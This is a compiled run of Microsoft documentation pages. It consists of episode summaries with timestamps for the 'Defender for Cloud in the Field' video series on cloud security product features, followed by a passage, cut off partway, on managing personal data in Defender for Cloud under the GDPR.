• Learn how to Review your security recommendations.
• Subscribe to Microsoft Security on YouTube
• Follow us on social media: LinkedIn, Twitter
• Join our Tech Community
• For more about Microsoft Security


Next steps 


Microsoft Defender for Servers 


Microsoft Defender for Servers 


Article • 04/27/2023


Episode description: In this episode of Defender for Cloud in the field, Aviv Mor joins
Yuri Diogenes to talk about Microsoft Defender for Servers updates, including the new
integration with Microsoft Defender Vulnerability Management (formerly TVM). Aviv
explains how this new integration with Defender Vulnerability Management works and
the advantages of this integration. Aviv covers the easy experience to onboard, software
inventory, the integration with MDE for Linux, and the Defender for Servers support for
the new multicloud connector for AWS.


• 1:22 - Overview of the announcements for Microsoft Defender for Servers
• 5:50 - Migration path from Qualys VA to Microsoft Defender Vulnerability
  Management
• 7:12 - Defender Vulnerability Management capabilities in Defender for Servers
• 8:38 - Threat detections for Defender for Servers
• 9:52 - Defender for Servers in AWS
• 12:23 - Onboard process for Defender Vulnerability Management in an
  on-premises scenario
• 13:20 - Demonstration


Recommended resources

• Learn how to Investigate weaknesses with Microsoft Defender Vulnerability
  Management.
• Subscribe to Microsoft Security on YouTube
• Follow us on social media: LinkedIn, Twitter
• Join our Tech Community
• For more about Microsoft Security


Next steps 


Lessons Learned from the Field 


Lessons learned from the field with 
Microsoft Defender for Cloud 


Article • 04/27/2023


Episode description: In this episode Carlos Faria, Microsoft Cybersecurity Consultant,
joins Yuri to talk about lessons from the field and how customers are using Microsoft
Defender for Cloud to improve their security posture and protect their workloads in a
multicloud environment.


Carlos also covers how Microsoft Defender for Cloud is used to fill the gap between
cloud security posture management and cloud workload protection, and demonstrates
some features related to this scenario.


• Why Microsoft Defender for Cloud is a unique solution when compared with
  other competitors?
• How to fulfill the gap between CSPM and CWPP
• 4:42 - How a multicloud affects the CSPM lifecycle and how Defender for Cloud fits
  in?
• 8:05 - Demonstration
• 12:34 - Final considerations


Recommended resources

• Learn more: What is Microsoft Defender for Cloud?
• Subscribe to Microsoft Security on YouTube
• Follow us on social media: LinkedIn, Twitter
• Join our Tech Community
• For more about Microsoft Security


Next steps 


New GCP Connector in Microsoft Defender for Cloud 


New GCP connector in Microsoft 
Defender for Cloud 


Article • 04/27/2023


Episode description: In this episode of Defender for Cloud in the field, Or Serok joins
Yuri Diogenes to share the new GCP Connector in Microsoft Defender for Cloud. Or
explains the use case scenarios for the new connector and how the new connector
works. She demonstrates the onboarding process to connect GCP with Microsoft
Defender for Cloud and talks about custom assessment and the CSPM experience for
multicloud.


• 1:23 - Overview of the new GCP connector
• 4:05 - Migration path from the old GCP connector to the new one
• 5:10 - Type of assessment utilized by the new GCP connector
• 5:51 - Custom assessments (deprecated)
• 6:52 - Demonstration
• 15:05 - Recommendation experience
• 18:00 - Final considerations


Recommended resources

• Learn more how to Connect your GCP projects to Microsoft Defender for Cloud.
• Subscribe to Microsoft Security on YouTube
• Follow us on social media: LinkedIn, Twitter
• Join our Tech Community
• For more about Microsoft Security


Next steps 


Microsoft Defender for IoT


Microsoft Defender for IoT


Article • 04/27/2023


Episode description: In this episode of Defender for Cloud in the Field, Dolev Zemer
joins Yuri Diogenes to talk about how Defender for IoT works. Dolev explains the
difference between OT Security and IT Security and how Defender for IoT fulfills this gap.
Dolev also demonstrates how Defender for IoT discovers devices to monitor and how it
fits in the Microsoft Security portfolio.


• 1:20 - Overview of the Defender for IoT solution
• 2:15 - Difference between OT and IoT
• 3:30 - Prerequisites to use Defender for IoT
• 4:30 - Security posture and threat detection
• 5:17 - Automating alert response
• 6:15 - Integration with Microsoft Sentinel
• 6:50 - Architecture
• 8:40 - Demonstration


Recommended resources

• Learn more about Defender for IoT.
• Subscribe to Microsoft Security on YouTube
• Follow us on social media: LinkedIn, Twitter
• Join our Tech Community
• For more about Microsoft Security


Next steps 


Microsoft Defender for Containers in a Multicloud Environment 


Microsoft Defender for Containers in a
Multicloud Environment


Article • 04/27/2023


Episode description: In this episode of Defender for Cloud in the field, Maya Herskovic
joins Yuri Diogenes to talk about Microsoft Defender for Containers implementation in
AWS and GCP.


Maya explains about the new workload protection capabilities related to Containers
when they're deployed in a multicloud environment. Maya also demonstrates the
onboarding experience in GCP and how to visualize security recommendations across
AWS, GCP, and Azure in a single dashboard.


• 01:12 - Container protection in a multicloud environment
• 05:03 - Workload protection capabilities for GCP
• 06:18 - Single dashboard for multi-cloud
• 10:25 - Demonstration


Recommended resources

• Learn how to Enable Microsoft Defender for Containers.
• Subscribe to Microsoft Security on YouTube
• Follow us on social media: LinkedIn, Twitter
• Join our Tech Community
• For more about Microsoft Security


Next steps 


Protecting Containers in GCP with Defender for Containers 


Protecting containers in GCP with 
Defender for Containers 


Article • 04/27/2023


Episode description: In this episode of Defender for Cloud in the field, Nadav Wolfin
joins Yuri Diogenes to talk about how to use Defender for Containers to protect
Containers that are located at Google Cloud (GCP).


Nadav gives insights about workload protection for GKE and how to obtain visibility of
this type of workload across Azure and AWS. Nadav also demonstrates the overall
onboarding experience and provides an overview of the architecture of this solution.


• Architecture solution for Defender for Containers and support for GKE
• How the onboard process works
• Demonstration
• 26:18 - Integration with Azure Arc


Recommended resources

• Learn how to Enable Microsoft Defender for Containers.
• Subscribe to Microsoft Security on YouTube
• Follow us on social media: LinkedIn, Twitter
• Join our Tech Community
• For more about Microsoft Security


Next steps 


Threat landscape for Containers 


Threat landscape for Defender for 
Containers 


Article • 04/27/2023


Episode description: In this episode of Defender for Cloud in the Field, Yossi Weizman
joins Yuri Diogenes to talk about the evolution of the threat matrix for Containers and
how attacks against Kubernetes have evolved. Yossi also demonstrates new detections
that are available for different attacks and how Defender for Containers can help to
quickly identify malicious activities in containers.


• The evolution of attacks against Kubernetes
• Identity related attacks against Kubernetes
• Threat detection beyond audit logs
• Demonstration


Recommended resources

• Learn how to detect identity attacks in Kubernetes.
• Subscribe to Microsoft Security on YouTube
• Follow us on social media: LinkedIn, Twitter
• Join our Tech Community
• For more about Microsoft Security


Next steps 


Enhanced workload protection features in Defender for Servers 


Enhanced workload protection features 
in Defender for Servers 


Article • 04/27/2023


Episode description: In this episode of Defender for Cloud in the Field, Netta Norman
joins Yuri Diogenes to talk about the enhanced capabilities available in Defender for
Servers, for VMs that are located in GCP, AWS and on-premises.


Netta explains how Defender for Servers applies Azure Arc as a bridge to onboard
non-Azure VMs as she demonstrates what the experience looks like.


• 00:55 - Arc Auto-provisioning in GCP
• 2:57 - Prerequisites to Arc auto-provisioning
• 3:50 - Considerations when enabling Defender for Server plan in GCP
• 5:20 - Dashboard refresh time interval
• 7:00 - Security value for non-Azure workloads
• 9:06 - Demonstration


Recommended resources

• Introduce yourself to Microsoft Defender for Servers.
• Subscribe to Microsoft Security on YouTube
• Follow us on social media: LinkedIn, Twitter
• Join our Tech Community
• For more about Microsoft Security


Next steps 


Defender for Storage 


Defender for Storage

Article • 04/27/2023

Episode description: In this episode of Defender for Cloud in the Field, Eitan Shteinberg joins Yuri Diogenes to talk about the threat landscape for Azure Storage and how Defender for Storage can help detect and mitigate these threats.

Eitan talks about different use case scenarios and best practices to deploy Defender for Storage, and he also demonstrates how to investigate an alert generated by Defender for Storage.

[Video: Microsoft Defender for Storage (Microsoft Security)]

- 01:00 - Current threats for cloud storage workloads
- 07:00 - Defender for Storage threat detections
- 10:10 - How Defender for Storage works after you enable it
- 20:35 - How to investigate a Defender for Storage alert
- 29:00 - Best practices to enable Defender for Storage
- 32:15 - What's coming next

Recommended resources

- Introduction to Microsoft Defender for Storage.
- Subscribe to Microsoft Security on YouTube
- Follow us on social media: LinkedIn, Twitter
- Join our Tech Community
- For more about Microsoft Security

Next steps

Defender for Servers deployment in AWS and GCP


Defender for Servers deployment in AWS and GCP

Article • 04/27/2023

Episode description: In this episode of Defender for Cloud in the Field, Ortal Parpara joins Yuri Diogenes to talk about the options to deploy Defender for Servers in AWS and GCP. Ortal talks about the new capability that allows you to select a different Defender for Servers plan per connector, demonstrates how to customize the deployment, and explains how this feature helps to deploy Azure Arc.

[Video: Defender for Servers deployment for AWS and GCP (Microsoft Security)]

- 00:00 - Introduction
- 01:30 - Selecting the appropriate plan for AWS and GCP
- 03:05 - Is it necessary to take any action to apply this change?
- 03:23 - Supported scenarios
- 03:40 - What changes should you expect to see in your environment?
- 05:49 - Demonstration

Recommended resources

- Enhanced workload protection features in Defender for Servers.
- Subscribe to Microsoft Security on YouTube
- Follow us on social media: LinkedIn, Twitter
- Join our Tech Community
- For more about Microsoft Security

Next steps

Remediate Security Recommendations with Governance


Remediate security recommendations with governance

Article • 04/27/2023

Episode description: In this episode of Defender for Cloud in the Field, Amit Biton joins Yuri Diogenes to talk about the new governance feature in Defender for Cloud. Amit explains the rationale behind this feature, why it's important to have governance in place in order to drive security posture improvement, and how this feature can help with that. Amit demonstrates how to create governance rules, and how to monitor and take action to improve the secure score.

[Video: Remediate Security Recommendations with Governance (Microsoft Security)]

- 01:14 - What is the governance feature?
- 05:54 - What are the permissions required to configure governance rules?
- 06:51 - How workload owners receive notifications
- 10:13 - Understanding the grace period
- 15:20 - Enabling governance at scale
- 16:25 - Demonstration

Recommended resources

- Driving your organization to remediate security issues with recommendation governance in Microsoft Defender for Cloud.
- Subscribe to Microsoft Security on YouTube
- Follow us on social media: LinkedIn, Twitter
- Join our Tech Community
- For more about Microsoft Security

Next steps

Defender for Servers integration with Microsoft Defender for Endpoint


Defender for Servers integration with Microsoft Defender for Endpoint

Article • 04/27/2023

Episode description: In this episode of Defender for Cloud in the Field, Erel Hansav joins Yuri Diogenes to talk about the latest updates regarding the Defender for Servers integration with Microsoft Defender for Endpoint. Erel explains the architecture of this integration for the different versions of Windows Server, how this integration takes place in the backend, the deployment options for Windows and Linux, and deployment at scale using Azure Policy.

[Video: Defender for Servers integration with MDE (Microsoft Security)]

- 00:00 - Introduction
- 02:13 - Understanding Microsoft Defender for Endpoint's integration with Defender for Servers
- 15:30 - Onboarding flow
- 20:05 - Options to deploy at scale

Recommended resources

- Protect your endpoints with Defender for Cloud's integrated EDR solution: Microsoft Defender for Endpoint
- Subscribe to Microsoft Security on YouTube
- Follow us on social media: LinkedIn, Twitter
- Join our Tech Community
- For more about Microsoft Security

Next steps

Defender for Cloud integration with Microsoft Entra | Defender for Cloud in the Field


Defender for Cloud integration with Microsoft Entra | Defender for Cloud in the Field

Article • 10/11/2023

Episode description: In this episode of Defender for Cloud in the Field, Bar Brownshtein joins Yuri Diogenes to talk about the new Defender for Cloud integration with Microsoft Entra. Bar explains the rationale behind this integration, the importance of having everything in a single dashboard, and how this integration works. Bar also covers the recommendations that are generated by this integration and demonstrates the experience in the dashboard.

https://aka.ms/docs/player?id=96a0ecdb-b1c3-423f-9ff1-47fcc5d6ab1b

- 00:00 - Defender for Cloud integration with Microsoft Entra
- 00:55 - What is Cloud Infrastructure Entitlement Management?
- 02:20 - How does the integration with MDC work?
- 03:58 - Demonstration

Recommended resources

- Learn more about Microsoft Entra Permissions Management
- Subscribe to Microsoft Security on YouTube
- Follow us on social media: LinkedIn, Twitter
- Join our Tech Community
- For more about Microsoft Security

Next steps

New AWS Connector in Microsoft Defender for Cloud


Defender for Azure Cosmos DB | Defender for Cloud in the Field

Article • 04/27/2023

Episode description: In this episode of Defender for Cloud in the Field, Haim Bendanan joins Yuri Diogenes to talk about Defender for Azure Cosmos DB. Haim explains the rationale behind using this plan to protect Azure Cosmos DB databases, the different threat detections that are available with this plan, and the security recommendations that were added. Haim also demonstrates how Defender for Azure Cosmos DB detects a SQL injection attack.

- 00:00 - Intro
- 01:37 - Azure Cosmos DB main use case scenarios
- 02:30 - Recommendations and alerts in Defender for Azure Cosmos DB
- 04:30 - SQL injection detection for Azure Cosmos DB
- 06:15 - Key extraction detection for Azure Cosmos DB
- 11:00 - Demonstration
- 14:30 - Final considerations

Recommended resources

- Learn more about enabling Microsoft Defender for Azure Cosmos DB
- Subscribe to Microsoft Security on YouTube
- Follow us on social media: LinkedIn, Twitter
- Join our Tech Community
- Learn more about Microsoft Security

Next steps

Defender for DevOps | Defender for Cloud in the Field


Defender for DevOps | Defender for Cloud in the Field

Article • 04/27/2023

Episode description: In this episode of Defender for Cloud in the Field, Sukhandeep Singh joins Yuri Diogenes to talk about Defender for DevOps. Sukhandeep explains how Defender for DevOps uses a central console to give security teams DevOps insights across multi-pipeline environments, such as GitHub and Azure DevOps. Sukhandeep also covers the security recommendations created by Defender for DevOps and demonstrates how to configure a GitHub connector from the Defender for Cloud dashboard.

- 01:16 - What is Defender for DevOps?
- 02:22 - Current integrations
- 02:47 - GitHub connector
- 04:16 - Security recommendations
- 05:54 - Protection for infrastructure as code
- 07:03 - Azure DevOps (ADO) connector
- 08:22 - Demonstration

Recommended resources

- Learn more about Defender for DevOps.
- Subscribe to Microsoft Security on YouTube
- Join our Tech Community
- Learn more about Microsoft Security
- Follow us on social media: LinkedIn, Twitter

Next steps

Cloud security explorer and attack path analysis


Cloud security explorer and attack path analysis | Defender for Cloud in the Field

Article • 04/27/2023

Episode description: In this episode of Defender for Cloud in the Field, Tal Rosler joins Yuri Diogenes to talk about cloud security explorer and attack path analysis, two new capabilities in Defender CSPM that were released at Ignite. The talk explains the rationale behind creating these features and how to use them to prioritize what matters most for keeping your environment secure. Tal also demonstrates how to use these capabilities to quickly identify vulnerabilities and misconfigurations in cloud workloads.

[Video: Cloud security explorer and Attack path analysis (Microsoft Security)]

- 01:27 - The business case for the cloud security graph
- 03:00 - What is the cloud security graph
- 05:06 - Demonstration
- 09:30 - How paths are created under attack path
- 12:00 - Cloud security explorer demonstration
- 19:25 - Saving cloud security explorer queries

Recommended resources

- Learn more about attack path.
- Subscribe to Microsoft Security on YouTube
- Join our Tech Community
- Learn more about Microsoft Security
- Follow us on social media: LinkedIn, Twitter

Next steps

Latest updates in the regulatory compliance dashboard


Latest updates in the regulatory compliance dashboard | Defender for Cloud in the Field

Article • 04/27/2023

Episode description: In this episode of Defender for Cloud in the Field, Ronit Reger joins Yuri Diogenes to talk about the latest updates in the regulatory compliance dashboard that were released at Ignite. Ronit talks about the new attestation capability and the new Microsoft cloud security benchmark. Ronit also demonstrates how to create manual attestations in the regulatory compliance dashboard.

- Intro
- What's new in the regulatory compliance dashboard
- The new Microsoft cloud security benchmark
- Demonstration
- 13:49 - Manual attestation

Recommended resources

- Learn more about improving your regulatory compliance.
- Subscribe to Microsoft Security on YouTube
- Join our Tech Community
- Learn more about Microsoft Security
- Follow us on social media: LinkedIn, Twitter

Next steps

Defender External Attack Surface Management (Defender EASM)


Defender EASM | Defender for Cloud in the Field

Article • 04/27/2023

Episode description: In this episode of Defender for Cloud in the Field, Jamil Mirza joins Yuri Diogenes to talk about Microsoft Defender External Attack Surface Management (Defender EASM). Jamil explains how Defender EASM continuously discovers and maps your digital attack surface to provide an external view of your online infrastructure. Jamil also covers the integration with Defender for Cloud, how it works, and he demonstrates different capabilities available in Defender EASM.

- 01:11 - What is Defender EASM?
- 02:59 - How does Defender EASM work?
- 05:55 - What type of information is discovered?
- 09:50 - Integration with Defender for Cloud
- 11:51 - Demonstration

Recommended resources

- Learn more about external attack surface management.
- Subscribe to Microsoft Security on YouTube
- Join our Tech Community
- Learn more about Microsoft Security
- Follow us on social media: LinkedIn, Twitter

Next steps

Defender Threat Intelligence (Defender TI)


Defender Threat Intelligence | Defender for Cloud in the Field

Article • 04/27/2023

Episode description: In this episode of Defender for Cloud in the Field, Alexandra Roland joins Yuri Diogenes to talk about Microsoft Defender Threat Intelligence (Defender TI). Alexandra explains how Defender TI works and how it integrates with Defender EASM. Alexandra goes over an end-to-end scenario to demonstrate how to use Defender TI to perform a security investigation based on the data collected by the platform.

- How Defender for Cloud leverages Defender TI
- What is the reputation score in Defender TI
- How to try Defender TI
- Demonstration

Recommended resources

- Learn more about Defender TI.
- Subscribe to Microsoft Security on YouTube
- Join our Tech Community
- Learn more about Microsoft Security
- Follow us on social media: LinkedIn, Twitter

Next steps

Enhancements in Defender for SQL Vulnerability Assessment


Enhancements in Defender for SQL vulnerability assessment | Defender for Cloud in the Field

Article • 04/27/2023

Episode description: In this episode of Defender for Cloud in the Field, Catalin Esanu joins Yuri Diogenes to talk about the enhancements in the Defender for SQL Vulnerability Assessment (VA) capability that were announced. Catalin explains how the new SQL VA Express changed to allow a frictionless onboarding experience and how it became easier to manage VA baselines. Catalin demonstrates how to enable this experience and how to customize the baseline with companion scripts.

- Architecture change in SQL VA
- Enabling SQL VA Express
- Performance considerations
- Other additions to SQL VA Express
- 12:56 - Demonstration

Recommended resources

- Learn more about Defender for SQL Vulnerability Assessment (VA).
- Subscribe to Microsoft Security on YouTube
- Join our Tech Community
- Learn more about Microsoft Security
- Follow us on social media: LinkedIn, Twitter

Next steps

AWS ECR Coverage in Defender for Containers


AWS ECR Coverage in Defender for Containers | Defender for Cloud in the Field

Article • 04/27/2023

Episode description: In this episode of Defender for Cloud in the Field, Tomer Spivak joins Yuri Diogenes to talk about the new AWS ECR coverage in Defender for Containers. Tomer explains how Defender for Containers performs vulnerability assessment for ECR workloads in AWS and how to enable this capability. Tomer demonstrates the user experience in Defender for Cloud, showing the vulnerability findings in the dashboard and the onboarding process.

- 00:00 - Intro
- 01:44 - Introducing AWS ECR coverage
- 03:38 - How new repos or images are discovered after the initial assessment
- 04:22 - Scanning frequency
- 07:33 - Demonstration

Recommended resources

- Learn more about AWS ECR coverage in Defender for Containers.
- Subscribe to Microsoft Security on YouTube
- Join our Tech Community
- Learn more about Microsoft Security
- Follow us on social media: LinkedIn, Twitter

Next steps

Governance capability improvements in Defender for Cloud


Governance capability improvements in Defender for Cloud | Defender for Cloud in the Field

Article • 04/27/2023

Episode description: In this episode of Defender for Cloud in the Field, Lior Arviv joins Yuri Diogenes to talk about the governance capability improvements in Defender for Cloud. Lior gives a quick recap of the business need for governance and covers the new at-scale governance capability. Lior demonstrates how to deploy governance at scale and how to monitor rule assignments and define priorities.

[Video: Governance capabilities improvements in Defender for Cloud (Microsoft Security)]

- 01:13 - Reviewing the need for cloud security governance
- 04:10 - Governance at scale
- 07:03 - Deployment options
- 07:45 - Demonstration
- 19:00 - Learn more about governance

Recommended resources

- Learn how to drive your organization to remediate security recommendations with governance
- Subscribe to Microsoft Security on YouTube
- Join our Tech Community
- Learn more about Microsoft Security
- Follow us on social media: LinkedIn, Twitter

Next steps

Demystifying Defender for Servers


Demystifying Defender for Servers | Defender for Cloud in the Field

Article • 04/27/2023

Episode description: In this episode of Defender for Cloud in the Field, Tom Janetscheck joins Yuri Diogenes to talk about the different deployment options in Defender for Servers. Tom covers the different agents available and the scenarios in which each agent is most commonly used, including the agentless feature. Tom also talks about the different vulnerability assessment solutions available, and how to deploy Defender for Servers at scale via policy or custom automation.

- 02:14 - Understanding Defender for Servers P1 and P2
- 06:15 - Pricing model
- 07:37 - Integration with MDE
- 10:08 - Using Defender for Servers P2 without MDE
- 11:32 - Understanding the different types of agents used by Defender for Servers
- 17:11 - The case for agentless implementation
- 22:52 - Deploying Defender for Servers at scale

Recommended resources

- Learn more about Defender for Servers
- Subscribe to Microsoft Security on YouTube
- Join our Tech Community
- Learn more about Microsoft Security
- Follow us on social media: LinkedIn, Twitter

Next steps

Zero Trust and Defender for Cloud


Zero Trust and Defender for Cloud | Defender for Cloud in the Field

Article • 04/27/2023

Episode description: In this episode of Defender for Cloud in the Field, Mekonnen Kassa joins Yuri Diogenes to discuss the importance of using Zero Trust. Mekonnen covers the principles of Zero Trust, the importance of switching your mindset to adopt this strategy, and how Defender for Cloud can help. Mekonnen also talks about best practices to get started, visibility and analytics as part of Zero Trust, and what tools can be leveraged to achieve it.

https://aka.ms/docs/player?id=125af768-01bd-45ac-8503-4dba5eb53ff7

- 01:21 - What is Zero Trust?
- 04:12 - Current challenges with multicloud and hybrid workloads
- 06:47 - How can Defender for Cloud help with Zero Trust?
- 11:38 - Azure network security controls that can help with Zero Trust
- 14:50 - Visibility and analytics for Zero Trust
- 18:09 - Final recommendations to start your Zero Trust journey

Recommended resources

- Learn more about Zero Trust
- Subscribe to Microsoft Security on YouTube
- Join our Tech Community
- Learn more about Microsoft Security
- Follow us on social media: LinkedIn, Twitter

Next steps

Security Policy Enhancements in Defender for Cloud


Security policy enhancements in Defender for Cloud

Article • 05/14/2023

Episode description: In this episode of Defender for Cloud in the Field, Tuval Rozner joins Yuri Diogenes to talk about the new security policy enhancements. Tuval covers the new security policy dashboard within Defender for Cloud, and how to filter and create exemptions from a single place without having to make changes in the Azure Policy dashboard. Tuval also demonstrates how to use the new dashboard and customize policies.

https://aka.ms/docs/player?id=1145810e-fc14-4d73-8d63-ea861aefb30b

- 01:21 - The rationale behind changing the security policy assignment experience
- 02:20 - What's new in the security policy assignment in Defender for Cloud?
- 04:20 - Demonstration
- 12:02 - What's next?

Recommended resources

- Learn more about managing security policies
- Subscribe to Microsoft Security on YouTube
- Join our Tech Community
- Learn more about Microsoft Security
- Follow us on social media: LinkedIn, Twitter

Next steps

New Custom Recommendations for AWS and GCP in Defender for Cloud


New custom recommendations for AWS and GCP in Defender for Cloud

Article • 09/13/2023

Episode description: In this episode of Defender for Cloud in the Field, Yael Genut joins Yuri Diogenes to talk about the new custom recommendations for AWS and GCP. Yael explains the importance of creating custom recommendations in a multicloud environment and how to use Kusto Query Language (KQL) to create these customizations. Yael also demonstrates the step-by-step process to create custom recommendations using this new capability and how these custom recommendations appear in the Defender for Cloud dashboard.

https://aka.ms/docs/player?id=41612fbe-4c9c-4cd2-9a99-3fbd94d31bec

- 01:44 - Understanding custom recommendations
- 03:15 - Creating a custom recommendation based on a template
- 08:20 - Creating a custom recommendation from scratch
- 12:27 - Custom recommendation update interval
- 14:30 - Filtering custom recommendations in the Defender for Cloud dashboard
- 16:40 - Prerequisites to use the custom recommendations feature

Recommended resources

- Learn how to create custom recommendations and security standards
- Subscribe to Microsoft Security on YouTube
- Join our Tech Community
- Learn more about Microsoft Security
- Follow us on social media: LinkedIn, Twitter

Next steps

Understanding data aware security posture capabilities


Understanding data aware security posture capability

Article • 06/08/2023

Episode description: In this episode of Defender for Cloud in the Field, Tzach Kaufmann joins Yuri Diogenes to talk about the data aware security posture capability that is part of Defender CSPM. Tzach explains the importance of having data aware security posture capability to help security admins with risk prioritization. Tzach also demonstrates the step-by-step process to onboard this capability and how to obtain the insights using Attack Path.

https://aka.ms/docs/player?id=dd11ab78-d945-4727-a4e4-cf19eb1922f2

- 00:00 - Intro
- 02:00 - What is data aware security posture?
- 03:38 - Understanding the onboarding process
- 05:00 - Sensitivity labels discovery process
- 07:05 - What's the difference between data aware security posture and Microsoft Purview?
- 11:35 - Demonstration

Recommended resources

- Learn more about data aware security posture
- Subscribe to Microsoft Security on YouTube
- Learn more about Microsoft Security
- Follow us on social media: LinkedIn, Twitter
- Join our Tech Community

Next steps

API Security with Defender for APIs


API Security with Defender for APIs

Article • 06/18/2023

Episode description: In this episode of Defender for Cloud in the Field, Preetham Naik joins Yuri Diogenes to talk about API security with Defender for APIs. Preetham explains the importance of API security and why the threats in this area are growing. Preetham introduces the new Defender for APIs plan released in public preview and gives an overview of all its capabilities. Preetham also demonstrates the step-by-step process to onboard this plan and how to address API security recommendations.

https://aka.ms/docs/player?id=657f8b1b-8072-4075-a244-07c93ecf6556

- 02:15 - Why is API security important?
- 05:15 - The state of the API security market
- 07:06 - What are the risks associated with APIs?
- 11:25 - What you should expect from Defender for APIs
- 15:53 - Demonstration

Recommended resources

- Learn more about Defender for APIs
- Subscribe to Microsoft Security on YouTube
- Learn more about Microsoft Security
- Follow us on social media: LinkedIn, Twitter
- Join our Tech Community

Next steps

Agentless Container Posture Management in Defender for Cloud


Agentless container posture management

Article • 06/18/2023

Episode description: In this episode of Defender for Cloud in the Field, Shani Freund Menscher joins Yuri Diogenes to talk about a new capability in Defender CSPM called agentless container posture management. Shani explains how agentless container posture management works, how to onboard, and how to leverage this feature to obtain more insights into container security. Shani also demonstrates how to visualize this information using Attack Path and Cloud Security Explorer.

https://aka.ms/docs/player?id=abceb157-b850-42f0-8b83-92cbef16c893

- 01:48 - Overview of Defender CSPM
- 03:06 - What container capabilities are included in Defender CSPM
- 05:00 - How to find container insights using Attack Path
- 06:14 - How agentless container posture management works
- 07:28 - Supported environments for this capability
- 07:48 - Demonstration

Recommended resources

- Learn more about agentless container posture
- Subscribe to Microsoft Security on YouTube
- Learn more about Microsoft Security
- Follow us on social media: LinkedIn, Twitter
- Join our Tech Community

Next steps

New AWS Connector in Microsoft Defender for Cloud


Understanding the DevOps Threat Matrix

Article • 06/21/2023

Episode description: In this episode of Defender for Cloud in the Field, Ariel Brukman joins Yuri Diogenes to talk about the DevOps Threat Matrix. Ariel talks about the process of creating a new threat matrix for a very complex domain such as DevOps, what was found during the research process, and how the research evolved to create this threat matrix. Ariel also talks about how to use the threat matrix to improve your DevOps defenses, and he gives examples of some common attacks against DevOps environments.

https://aka.ms/docs/player?id=20631aa4-501c-4fa6-bd9c-eadab45887af

- 02:49 - The research leading to the DevOps Threat Matrix publication
- 05:35 - Threats in the execution phase
- 08:50 - Privilege escalation phase
- 13:00 - Common patterns of attack
- 13:42 - Recommendations to build better defenses

Recommended resources

- Learn more about the DevOps Threat Matrix
- Subscribe to Microsoft Security on YouTube
- Learn more about Microsoft Security
- Follow us on social media: LinkedIn, Twitter
- Join our Tech Community

Next steps

New AWS Connector in Microsoft Defender for Cloud


Security alert correlation

Article • 08/29/2023

Episode description: In this episode of Defender for Cloud in the Field, Daniel Davrayev joins Yuri Diogenes to talk about the security alert correlation capability in Defender for Cloud. Daniel talks about the importance of having a built-in capability to correlate alerts in Defender for Cloud, and how this capability saves SOC analysts time when investigating alerts and responding to potential threats. Daniel also explains how data correlation works and demonstrates how this correlation appears in the Defender for Cloud dashboard as a security incident.

https://aka.ms/docs/player?id=6573561d-70a6-4b4c-ad16-9efe747c9a61

- 00:00 - Intro
- 02:15 - How Defender for Cloud handles alert prioritization
- 04:29 - How Defender for Cloud can help with alert correlation
- 07:05 - How Defender for Cloud creates alert correlations
- 09:06 - Does alert correlation work across different Defender for Cloud plans?
- 11:42 - Demonstration

Recommended resources

- Learn more
- Subscribe to Microsoft Security on YouTube
- Learn more about Microsoft Security
- Follow us on social media: LinkedIn, Twitter
- Join our Tech Community

Next steps

Defender CSPM support for GCP and more updates


Defender CSPM support for GCP and more updates

Article • 08/29/2023

Episode description: In this episode of Defender for Cloud in the Field, Amit Biton joins Yuri Diogenes to talk about the new Defender CSPM support for GCP. Amit talks about the recent investments in multicloud and the alignment with the Microsoft CNAPP strategy. Amit covers the capabilities that were released in Defender CSPM to cover GCP, including the new Microsoft cloud security benchmark for GCP. Amit also demonstrates the use of Attack Path and Cloud Security Explorer in a multicloud environment.

https://aka.ms/docs/player?id=673a8d91-3b0e-4bfb-986c-888ae7532320

- 01:23 - Overview of the new announcements for multicloud
- 05:09 - Microsoft CNAPP strategy
- 08:55 - Agentless capability
- 12:54 - Demonstration

Recommended resources

- Learn more
- Subscribe to Microsoft Security on YouTube
- Learn more about Microsoft Security
- Follow us on social media: LinkedIn, Twitter
- Join our Tech Community

Next steps

Capabilities to counter identity-based supply chain attacks


Capabilities to counter identity-based supply chain attacks

Article • 08/29/2023

Episode description: In this episode of Defender for Cloud in the Field, security researcher Hagai Kestenberg joins Yuri Diogenes to talk about Defender for Cloud capabilities to counter identity-based supply chain attacks. Hagai explains the different types of supply chain attacks and focuses on the risks of identity-based supply chain attacks. Hagai makes recommendations to mitigate this type of attack and explains the new capability in Defender for Resource Manager that can be used to identify it. Hagai also demonstrates the new alert generated by Defender for Resource Manager when this type of attack is identified.

https://aka.ms/docs/player?id=d69fb652-46a7-4f8c-8632-8cf2cbc3685a

- 01:41 - Intro
- 04:04 - Understanding identity-based supply chain attacks
- 06:50 - Identity-based supply chain attacks sample scenario
- 08:26 - Best practices to prevent identity-based supply chain attacks
- 10:29 - Demonstration

Recommended resources

- Learn more
- Subscribe to Microsoft Security on YouTube
- Learn more about Microsoft Security
- Follow us on social media: LinkedIn, Twitter
- Join our Tech Community

Next steps

New AWS Connector in Microsoft Defender for Cloud


Manage user data in Microsoft Defender for Cloud

Article • 05/24/2023


This article provides information about how you can manage the user data in Microsoft 
Defender for Cloud. Managing user data includes the ability to access, delete, or export 
data. 


Note

This article provides steps about how to delete personal data from the device or service and can be used to support your obligations under the GDPR. For general information about GDPR, see the GDPR section of the Microsoft Trust Center and the GDPR section of the Service Trust portal.

A Defender for Cloud user assigned the role of Reader, Owner, Contributor, or Account Administrator can access customer data within the tool. To learn more about the Account Administrator role, see Azure subscription administrators. To learn more about the Reader, Owner, and Contributor roles, see Built-in roles for Azure role-based access control.


Searching for and identifying personal data 


A Defender for Cloud user can view their personal data through the Azure portal. 
Defender for Cloud only stores security contact details such as email addresses and 
phone numbers. For more information, see Provide security contact details in Microsoft 
Defender for Cloud. 


In the Azure portal, a user can view allowed IP configurations using Defender for Cloud's 
just-in-time VM access feature. For more information, see Manage virtual machine 
access using just-in-time.


In the Azure portal, a user can view security alerts provided by Defender for Cloud 
including IP addresses and attacker details. For more information, see Managing and 
responding to security alerts in Microsoft Defender for Cloud. 


Classifying personal data 


You don't need to classify personal data found in Defender for Cloud's security contact 
feature. The data saved is an email address (or multiple email addresses) and a phone 
number. Contact data is validated by Defender for Cloud. 


You don't need to classify the IP addresses and port numbers saved by Defender for 
Cloud's just-in-time feature. 


Only a user assigned the role of Administrator can classify personal data by viewing 
alerts in Defender for Cloud. 


Securing and controlling access to personal data


A Defender for Cloud user assigned the role of Reader, Owner, Contributor, or Account 
Administrator can access security contact data. 


A Defender for Cloud user assigned the role of Reader, Owner, Contributor, or Account 
Administrator can access their just-in-time policies. 


A Defender for Cloud user assigned the role of Reader, Owner, Contributor, or Account 
Administrator can view their alerts. 


Updating personal data 


